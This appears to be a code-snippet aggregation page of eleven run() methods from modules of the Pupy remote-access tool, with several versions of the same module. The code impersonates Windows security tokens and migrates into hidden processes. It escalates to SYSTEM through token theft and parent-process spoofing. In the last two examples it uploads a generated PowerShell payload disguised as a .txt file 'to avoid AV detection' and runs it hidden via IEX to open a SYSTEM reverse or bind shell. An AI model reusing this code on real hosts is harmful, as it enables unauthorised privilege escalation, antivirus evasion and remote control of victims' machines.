Пример #1
0
 def run(self, args):
     if args.list:
         #with redirected_stdo(self.client.conn):
         l = obtain(
             self.client.conn.modules["pupwinutils.security"].ListSids())
         #self.log('\n'.join(["%s : %s"%x for x in l]))
         self.rawlog(
             self.formatter.table_format(
                 [{
                     "pid": x[0],
                     "process": x[1],
                     "sid": x[2],
                     "username": x[3]
                 } for x in l],
                 wl=["pid", "process", "username", "sid"]))
     elif args.impersonate:
         if args.migrate:
             proc_pid = self.client.conn.modules[
                 "pupwinutils.security"].create_proc_as_sid(
                     args.impersonate)
             migrate(self, proc_pid)
         else:
             self.client.impersonated_dupHandle = self.client.conn.modules[
                 "pupwinutils.security"].impersonate_sid_long_handle(
                     args.impersonate, close=False)
         self.success("Sid %s impersonated !" % args.impersonate)
     elif args.rev2self:
         self.client.conn.modules["pupwinutils.security"].rev2self()
         self.client.impersonated_dupHandle = None
         self.success("rev2self called")
     else:
         self.error("no option supplied")
Пример #2
0
    def run(self, args):
        if args.list:
            ListSids = self.client.remote('pupwinutils.security', 'ListSids')

            sids = ListSids()

            process_table = []
            sids_table = []
            sids_dict = {}

            for (pid, process, sid, username) in sids:
                process_table.append({
                    'pid': pid,
                    'process': process,
                    'sid': sid,
                    'username': username
                })

                sids_dict[sid] = username

            for sid, username in sids_dict.iteritems():
                sids_table.append({
                    'sid': sid,
                    'username': username
                })

            self.log(MultiPart([
                Table(process_table, [
                    'pid', 'process', 'username', 'sid'
                ], caption='Process table'),

                Table(sids_table, [
                    'sid', 'username'
                ], caption='Available Sids')
            ]))

        elif args.impersonate:
            if args.migrate:
                create_proc_as_sid = self.client.remote('pupwinutils.security', 'create_proc_as_sid', False)

                proc_pid = create_proc_as_sid(args.impersonate)
                migrate(self, proc_pid, keep=True)
            else:
                impersonate_sid_long_handle = self.client.remote(
                    'pupwinutils.security', 'impersonate_sid_long_handle', False)

                self.client.impersonated_dupHandle = impersonate_sid_long_handle(args.impersonate, close=False)

            self.success('Sid {} impersonated !'.format(args.impersonate))

        elif args.rev2self:
            rev2self = self.client.remote('pupwinutils.security', 'rev2self', False)

            rev2self()
            self.client.impersonated_dupHandle = None
            self.success('rev2self called')

        else:
            self.error('no option supplied')
Пример #3
0
	def run(self, args):
		pid=None
		if args.create:
			p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.create)
			pid=p.pid
			self.success("%s created with pid %s"%(args.create,pid))
		else:
			pid=args.pid
		migrate(self, pid, args.keep)
Пример #4
0
 def run(self, args):
     pid = None
     if args.create:
         p = self.client.conn.modules[
             'pupwinutils.processes'].start_hidden_process(args.create)
         pid = p.pid
         self.success("%s created with pid %s" % (args.create, pid))
     else:
         pid = args.pid
     migrate(self, pid, args.keep)
Пример #5
0
 def run(self, args):
     if args.list:
         #with redirected_stdo(self.client.conn):
         l=obtain(self.client.conn.modules["pupwinutils.security"].ListSids())
         #self.log('\n'.join(["%s : %s"%x for x in l]))
         self.rawlog(self.formatter.table_format([{"pid": x[0], "process":x[1], "sid" : x[2], "username":x[3]} for x in l], wl=["pid", "process", "username", "sid"]))
     elif args.impersonate:
         if args.migrate:
             proc_pid=self.client.conn.modules["pupwinutils.security"].create_proc_as_sid(args.impersonate)
             migrate(self, proc_pid, keep=True)
         else:
             self.client.impersonated_dupHandle=self.client.conn.modules["pupwinutils.security"].impersonate_sid_long_handle(args.impersonate, close=False)
         self.success("Sid %s impersonated !"%args.impersonate)
     elif args.rev2self:
         self.client.conn.modules["pupwinutils.security"].rev2self()
         self.client.impersonated_dupHandle=None
         self.success("rev2self called")
     else:
         self.error("no option supplied")
Пример #6
0
    def run(self, args):
        if args.list:
            ListSids = self.client.remote('pupwinutils.security', 'ListSids')

            sids = ListSids()

            self.table([{
                'pid': x[0],
                'process': x[1],
                'sid': x[2],
                'username': x[3]
            } for x in sids],
                       wl=['pid', 'process', 'username', 'sid'])

        elif args.impersonate:
            if args.migrate:
                create_proc_as_sid = self.client.remote(
                    'pupwinutils.security', 'create_proc_as_sid', False)

                proc_pid = create_proc_as_sid(args.impersonate)
                migrate(self, proc_pid, keep=True)
            else:
                impersonate_sid_long_handle = self.client.remote(
                    'pupwinutils.security', 'impersonate_sid_long_handle',
                    False)

                self.client.impersonated_dupHandle = impersonate_sid_long_handle(
                    args.impersonate, close=False)

            self.success('Sid {} impersonated !'.format(args.impersonate))

        elif args.rev2self:
            rev2self = self.client.remote('pupwinutils.security', 'rev2self',
                                          False)

            rev2self()
            self.client.impersonated_dupHandle = None
            self.success('rev2self called')

        else:
            self.error('no option supplied')
Пример #7
0
	def run(self, args):
		with redirected_stdo(self.client.conn):
			proc_pid=self.client.conn.modules["pupwinutils.security"].getsystem()
		migrate(self, proc_pid)
		self.success("got system !")
Пример #8
0
 def run(self, args):
     with redirected_stdo(self.client.conn):
         proc_pid = self.client.conn.modules[
             "pupwinutils.getsystem"].getsystem()
     migrate(self, proc_pid)
     self.success("got system !")
Пример #9
0
    def run(self, args):

        # Command to execute on the target
        cmdToExecute = None

        # The the local file which contains PS1 script (when powershell chosen or enabled automcatically)
        local_file = ''

        # True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
        isBindLauncherForPs1 = False

        # Contains ip:port used for bind connection on the target with ps1 script.
        # None if reverse connection and (consequently) isBindLauncherForPs1==False

        listeningAddressPortForBindPs1 = None
        # Usefull information for bind mode connection (ps1 script)
        launcherType, addressPort = self.client.desc[
            'launcher'], self.client.desc['address']

        completion = None

        # Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
        if launcherType == "bind":
            self.info(
                'The current pupy launcher is using a BIND connection. It is listening on {0} on the target'
                .format(addressPort))
            isBindLauncherForPs1 = True
            self.info(
                'Consequently, powershell option is enabled automatically')
            args.powershell = True
        else:
            self.info(
                'The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)'
            )
            isBindLauncherForPs1 = False

        # A Powershell payload is used for getting a pupy session as SYSTEM
        if args.powershell:
            self.info(
                'A powershell payload will be used for getting a pupy session as SYSTEM'
            )
            clientConfToUse = None

            if isBindLauncherForPs1:
                self.info(
                    'Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'
                    .format(addressPort))
                self.info(
                    "Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port"
                )
                self.info(
                    "Be careful, you have to choose a port which is not used on the target!"
                )
                listeningPort = -1
                while listeningPort == -1:
                    try:
                        listeningPort = int(
                            input(
                                "[?] Give me the listening port to use on the target: "
                            ))
                    except Exception as e:
                        self.warning(
                            "You have to give me a valid port. Try again. ({})"
                            .format(e))
                listeningAddress = addressPort.split(':')[0]
                listeningAddressPortForBindPs1 = "{0}:{1}".format(
                    listeningAddress, listeningPort)
                self.info(
                    "The ps1 script used for getting a pupy session as SYSTEM will be configured for listening on {0} on the target"
                    .format(listeningAddressPortForBindPs1))
                bindConf = self.client.get_conf()
                #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
                bindConf['launcher_args'][
                    bindConf['launcher_args'].index("--port") +
                    1] = str(listeningPort)
                clientConfToUse = bindConf
            else:
                self.info(
                    'Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection'
                )
                clientConfToUse = self.client.get_conf()

            cmdToExecute, completion = powerloader.serve(self, clientConfToUse)

        # restart current exe as system
        if args.restart:
            self.info(
                'Trying to configure for running the current executable on the target as SYSTEM'
            )
            exe = self.client.desc['exec_path'].split('\\')
            if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe'
                                             ] and exe[1].lower() == 'windows':
                self.warning('It seems that your current process is %s' %
                             self.client.desc['exec_path'])
                self.warning('It is not recommended to restart it')
                return

            cmdToExecute = self.client.desc['exec_path']

        if args.method == 'inheritance':
            if not cmdToExecute:
                cmdToExecute = args.execute

            if cmdToExecute is None:
                self.error(
                    'Application to execute with SYSTEM privileges should '
                    'be specified with one of -x/-p/-r args')
                return

            try:
                enable_privilege = self.client.remote('pupwinutils.security',
                                                      'EnablePrivilege', False)
                enable_privilege('SeDebugPrivilege')
                self.success('{} enabled'.format('SeDebugPrivilege'))
            except Exception as e:
                self.error('{} was not enabled: {}'.format(
                    'SeDebugPrivilege', e.args[1]))

            create_new_process_from_ppid = self.client.remote(
                'pupwinutils.security', 'create_new_process_from_ppid', False)

            if args.parentID:
                self.info(
                    'Using the Parent Process method on the pid {0}...'.format(
                        args.parentID))
                self.info('Command: {}'.format(cmdToExecute))

                pid = create_new_process_from_ppid(int(args.parentID),
                                                   cmdToExecute)
                self.success('Created: pid={}, ppid={}'.format(
                    pid, args.parentID))
                return

            else:
                self.info(
                    "Getting information about all processes running on the target"
                )

                enum_processes = self.client.remote('pupwinutils.processes',
                                                    'enum_processes')
                get_integrity_level = self.client.remote(
                    'pupwinutils.security', 'get_integrity_level', False)

                self.info(
                    "Searching a process with a 'SYSTEM' integrity level")

                for aprocess in enum_processes():
                    integrityLevel = get_integrity_level(aprocess['pid'])

                    if not integrityLevel == 'System':
                        continue

                    self.info(
                        "{0} (pid {1}) has a 'SYSTEM' integrity level, trying to use it"
                        .format(aprocess['name'], aprocess['pid']))

                    try:
                        pid = create_new_process_from_ppid(
                            aprocess['pid'], cmdToExecute)
                        self.success('Created: pid={}, ppid={}'.format(
                            pid, aprocess['pid']))
                        break

                    except Exception as e:
                        self.error('Failed: {}'.format(' '.join(
                            x for x in e.args if type(x) is str)))

        elif args.method == 'impersonate':
            if cmdToExecute is None:
                cmdToExecute = args.execute or 'cmd.exe'

            getsystem = self.client.remote('pupwinutils.security', 'getsystem',
                                           False)
            proc_pid = getsystem(cmdToExecute)

            self.success('Impersonated, pid={}. Migrating..'.format(proc_pid))
            migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
            return

        if args.powershell:
            if completion and not completion.is_set():
                self.info('Waiting for PowerLoader completion')
                completion.wait()

            if isBindLauncherForPs1:
                self.success(
                    'You have to connect to the target manually on {0}: '
                    'try "connect --host {0}" in pupy shell'.format(
                        listeningAddressPortForBindPs1))
            else:
                self.success(
                    'Waiting for a connection (take few seconds, 1 min max)...'
                )

            if local_file:
                os.remove(local_file)
Пример #10
0
    def run(self, args):

        local_file = ''

        # restart current exe as system
        if args.restart:
            self.info('Using current executable')
            exe = self.client.desc['exec_path'].split('\\')
            if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe'
                                             ] and exe[1].lower() == 'windows':
                self.warning('It seems that your current process is %s' %
                             self.client.desc['exec_path'])
                self.warning('It is not recommended to restart it')
                return

            cmd = self.client.desc['exec_path']

        # use powerhell to get a reverse shell
        elif args.powershell:
            ros = self.client.conn.modules['os']
            rtempfile = self.client.conn.modules['tempfile']
            tempdir = rtempfile.gettempdir()
            random_name = ''.join([
                random.choice(string.ascii_letters + string.digits)
                for n in xrange(6)
            ])
            remotefile = ''

            self.info('Using powershell payload')
            if '64' in self.client.desc['os_arch']:
                local_file = pupygen.generate_ps1(self.client.get_conf(),
                                                  x64=True)
            else:
                local_file = pupygen.generate_ps1(self.client.get_conf(),
                                                  x86=True)

            # change the ps1 to txt file to avoid AV detection
            random_name += '.txt'
            remotefile = ros.path.join(tempdir, random_name)

            cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
            param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile

            cmd = '%s %s' % (cmd, param)

            self.info("Uploading file in %s" % remotefile)
            upload(self.client.conn, local_file, remotefile)

        # migrate
        else:
            cmd = args.prog

        with redirected_stdo(self):
            proc_pid = self.client.conn.modules[
                "pupwinutils.security"].getsystem(prog=cmd)

        if args.migrate and not args.restart and not args.powershell:
            migrate(self, proc_pid)
            self.success("got system !")
        else:
            self.success(
                "Waiting for a connection (take few seconds, 1 min max)...")

        if args.powershell:
            os.remove(local_file)
Пример #11
0
    def run(self, args):

        local_file  = ''
        #True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
        isBindLauncherForPs1 = False
        #Contains ip:port used for bind connection on the target with ps1 script. None if reverse connection and (consequently) isBindLauncherForPs1==False
        listeningAddressPortForBindPs1 = None
        #Usefull information for bind mode connection (ps1 script)
        launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
        #Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
        if launcherType == "bind":
            self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort))
            isBindLauncherForPs1 = True
            self.info('Consequently, powershell option is enabled')
            args.powershell = True
        else:
            self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)')
            isBindLauncherForPs1 = False

        # restart current exe as system
        if args.restart:
            self.info('Using current executable')
            exe = self.client.desc['exec_path'].split('\\')
            if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows':
                self.warning('It seems that your current process is %s' % self.client.desc['exec_path'])
                self.warning('It is not recommended to restart it')
                return

            cmd = self.client.desc['exec_path']

        # use powerhell to get a reverse shell
        elif args.powershell or isBindLauncherForPs1:
            clientConfToUse = None
            ros         = self.client.conn.modules['os']
            rtempfile   = self.client.conn.modules['tempfile']
            tempdir     = rtempfile.gettempdir()
            random_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(6)])
            remotefile  = ''

            if isBindLauncherForPs1:
                self.info('Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'.format(addressPort))
                self.info("Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port")
                self.info("Be careful, you have to choose a port which is not used on the target!")
                listeningPort = -1
                while listeningPort==-1:
                    try:
                        listeningPort = int(input("[?] Give me the listening port to use on the target: "))
                    except Exception as e:
                        self.warning("You have to give me a valid port. Try again. ({})".format(e))
                listeningAddress = addressPort.split(':')[0]
                listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort)
                self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1))
                bindConf = self.client.get_conf()
                #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
                bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort)
                clientConfToUse = bindConf
            else:
                self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection')
                clientConfToUse = self.client.get_conf()
            if '64' in  self.client.desc['proc_arch']:
                local_file = pupygen.generate_ps1(clientConfToUse, x64=True)
            else:
                local_file = pupygen.generate_ps1(clientConfToUse, x86=True)

            # change the ps1 to txt file to avoid AV detection
            random_name += '.txt'
            remotefile  = ros.path.join(tempdir, random_name)

            cmd     = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
            param   = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile

            cmd = '%s %s' % (cmd, param)

            self.info("Uploading file in %s" % remotefile)
            upload(self.client.conn, local_file, remotefile)

        # migrate
        else:
            cmd     = args.prog

        with redirected_stdo(self):
            proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd)

        if args.migrate and not args.restart and not args.powershell:
            migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
            self.success("got system !")
        else:
            if isBindLauncherForPs1 == True:
                self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1))
            else:
                self.success("Waiting for a connection (take few seconds, 1 min max)...")

        if args.powershell:
            os.remove(local_file)